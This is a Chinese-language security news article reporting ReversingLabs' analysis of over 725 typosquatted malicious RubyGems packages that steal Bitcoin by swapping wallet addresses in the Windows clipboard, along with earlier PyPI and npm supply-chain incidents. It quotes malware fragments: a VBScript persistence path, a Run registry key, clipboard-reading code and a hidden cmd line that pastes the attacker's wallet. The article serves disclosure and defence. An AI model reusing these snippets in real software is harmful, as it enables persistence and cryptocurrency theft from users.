RubyGems遭遇供应链投毒攻击窃取比特币,被上传725个恶意软件包

安全
根据安全公司ReversingLabs有关报道,Ruby语言官方模块包代码库RubyGems,被植入了超725个恶意软件包的。

根据安全公司ReversingLabs有关报道,Ruby语言官方模块包代码库RubyGems,被植入了超725个恶意软件包的。

[[322851]]

根据安全公司ReversingLabs的分析恶意软件包的下载量接近100000次,尽管其中很大一部分可能是脚本自动抓取了存储库中158000个软件包的结果。恶意软件包来自两个用户帐户:" PeterGibbons" 和 "JimCarrey"。

ReversingLabs怀疑这些帐户可能是一个人的工作,他使用了多种形式的监听行为,冒充正常软件包。例如,"atlas-client"是一个诱骗的诱饵程序包,被2100次下载,用来模仿的"atlas_client"。从2月16日到25日,这两账号共上传了700多个软件包。

攻击流程

根据ReversingLabs分析,这些恶意软件安装后将执行一个脚本,该脚本会拦截在Windows设备上进行的比特币付款。

首先,它使用"%PROGRAMDATA%\Microsoft Essentials\Software Essentials.vbs"路径中的主要恶意循环创建一个新的VBScript Sle。然后持久化到本机,然后创建一个新的自动运行注册表项。

  1. "HCU\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Software Essentials" 

实现重启后的自动运行。

执行"Software Essentials.vbs"恶意脚本时,会启动无限循环,在该循环中,它使用以下代码行捕获用户的剪贴板数据:

  1. Set objHTML = CreateObject("htmlfile") 
  2. text = objHTML.ParentWindow.ClipboardData.GetDat 

然后,脚本将检查剪贴板数据是否与加密货币钱包地址的格式匹配。如果是,则使用以下命令在隐藏窗口中将加密币的地址替换为 "1JkU5XdNLji4Ugbb8agEWL1ko5US42nNmc":

  1. WScript.Shell run "C:\Windows\System32\cmd.exe /c echo 1JkU5XdNLji4Ugbb8agEWL1ko5US42nNmc | clip", 0 

这样,威胁参与者就试图将所有潜在的加密货币交易重定向到其钱包地址。整个过程如下顺序:

历史事件

无独有偶,这次供应链投毒事件不是第一次,这样事件最近几年来屡见不鲜。对RubyGems也发生了多起。2016年,一名大学生将一个粗略脚本上传到RubyGems,PyPi和NPM,根据对脚本中执行的回访调用统计,该冒名脚本大概在17000个独立IP上执行了大概45000次,其代码成功获取管理权限的有一半。其中还有两个是以.mil结尾的域,表明美军内部的主机也被感染。

此后,类似技术开始流行。2018年,黑客给PyPi中注入了剪贴板劫持脚本。该恶意程序包的名称为"Colourama",名字模仿Colorama。Colorama为Python包仓库中下载量Top 20之一。包括从镜像站点的下载,恶意软件包被下载了171次。

一个月后,有一次攻击者利用NPM植入后门,成功偷到比特币的事件。这次事件中,恶意后门被下载了200万次下,从而使攻击者获得了最后的成功成就。

这些事件表明,针对软件供应链的污染投毒间接攻击已经成了一种常态,这类攻击可能没有直接攻击那样明显,但是针对该类攻击目前还没有有效的防护措施,只能让开发人员擦亮眼睛,对要下载的软件包一定要慎重,可以通过必要的校验方法来保证包合法,比如验证文件包哈希,同时关注安全通报以便出现问题时能及时处理。企业可以通过DevSecOps来保证整个供应链的安全。

 

 

责任编辑:赵宁宁 来源: 虫虫搜奇
相关推荐

2022-05-12 09:45:41

网络钓鱼网络攻击供应链攻击

2013-11-10 17:03:56

2021-07-04 10:38:13

REvil勒索软件供应链攻击

2023-04-24 20:47:08

2021-09-16 14:59:18

供应链攻击漏洞网络攻击

2021-04-25 15:49:06

拜登黑客攻击

2022-04-06 10:12:51

Go供应链攻击风险

2021-03-31 14:31:43

供应链攻击恶意代码CISO

2023-02-23 07:52:20

2022-04-13 14:49:59

安全供应链Go

2023-07-19 11:57:33

2022-11-03 11:15:19

2024-09-05 15:12:07

2023-11-03 15:35:59

2021-09-12 14:38:41

SolarWinds供应链攻击Autodesk

2021-06-04 10:05:59

供应链安全

2023-05-29 13:44:10

2022-06-02 10:23:44

供应链安全工具

2021-06-07 10:10:30

供应链攻击软件Codecov攻击

2023-11-09 07:59:57

点赞
收藏

51CTO技术栈公众号